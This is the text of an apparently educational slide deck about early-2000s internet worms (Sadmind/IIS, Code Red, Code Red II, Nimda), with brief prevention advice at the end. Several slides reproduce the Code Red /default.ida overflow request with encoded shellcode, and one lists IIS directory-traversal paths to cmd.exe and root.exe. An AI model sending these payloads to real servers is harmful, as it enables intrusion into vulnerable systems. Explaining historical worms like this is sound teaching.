Title: INTERNET WORMS
1INTERNET WORMS
- The Hackers That Never Sleep
2/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNu9090u6858
ucbd3u7801u9090u6858ucbd3u7801u9090u6858uc
bd3u7801u9090u9090u8190u00c3u0003u8b00u531
bu53ffu0078u0000u00a
3(No Transcript)
4(No Transcript)
5BUFFER OVERFLOWS
BUFFER
RETURN ADDRESS
BRETT
RETURN ADDRESS
RETURN ADDRESS
XXXXXXXXXXXXXXXXX
6BUFFER
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNu9090u6858
ucbd3u7801u9090u6858ucbd3u7801u9090u6858uc
bd3u7801u9090u9090u8190u00c3u0003u8b00u531
bu53ffu0078u0000u00a
OVERFLOW
7SADMIND/IIS WORM
- 2 YEAR OLD BUFFER OVERFLOW
- WEB SERVER FOLDER DIRECTORY TRAVERSAL
8(No Transcript)
9WEB FOLDER DIRECTORY TRAVERSAL
- 40 IIS SERVERS VULNERABLE
- COMMAND EXECUTION ON SERVER
/INETPUB/WWWROOT /WINNT/SYSTEM32
/WWWROOT/../../WINNT/SYSTEM32/CMD.EXE
/WWWROOT/..c0af..c0afWINNT/SYSTEM32/CMD.EXE
/SCRIPTS/ROOT.EXE
10CODE RED
- 300,000 COMPUTERS IN 12 HOURS
11(No Transcript)
12/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNu9090u6858
ucbd3u7801u9090u6858ucbd3u7801u9090u6858uc
bd3u7801u9090u9090u8190u00c3u0003u8b00u531
bu53ffu0078u0000u00a
13/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXu9090u6858
ucbd3u7801u9090u6858ucbd3u7801u9090u6858uc
bd3u7801u9090u9090u8190u00c3u0003u8b00u531
bu53ffu0078u0000u00a
14CODE RED II
15CODE RED II BACKDOORS
- CAN BE ACCESSED WITH A WEB BROWSER
- DOWNLOAD AND INSTALL PROGRAMS
16NIMDA WORM
- DISCOVERED SEPTEMBER 2001
- WORM AND VIRUS TECHNIQUES
- 100,000 COMPUTERS IN FIRST DAY
- EXECUTABLE FILE INFECTION
- RELATIVE PATH DLL VULNERABILITY
17AUTOMATIC ATTACHMENT EXECUTION
- 7-MONTH-OLD VULNERABILITY
- ATTACHMENT DISGUISED AS WAV SOUND FILE
18WHAT DO THEY WANT
- THOUSANDS OF PEOPLE HAVE ACCESS
19PREVENTING AN ATTACK
- CONTINUOUS SCANNING SERVICE
- UPDATED AUDITING SOFTWARE
- SECURE FROM 90 OF HACKERS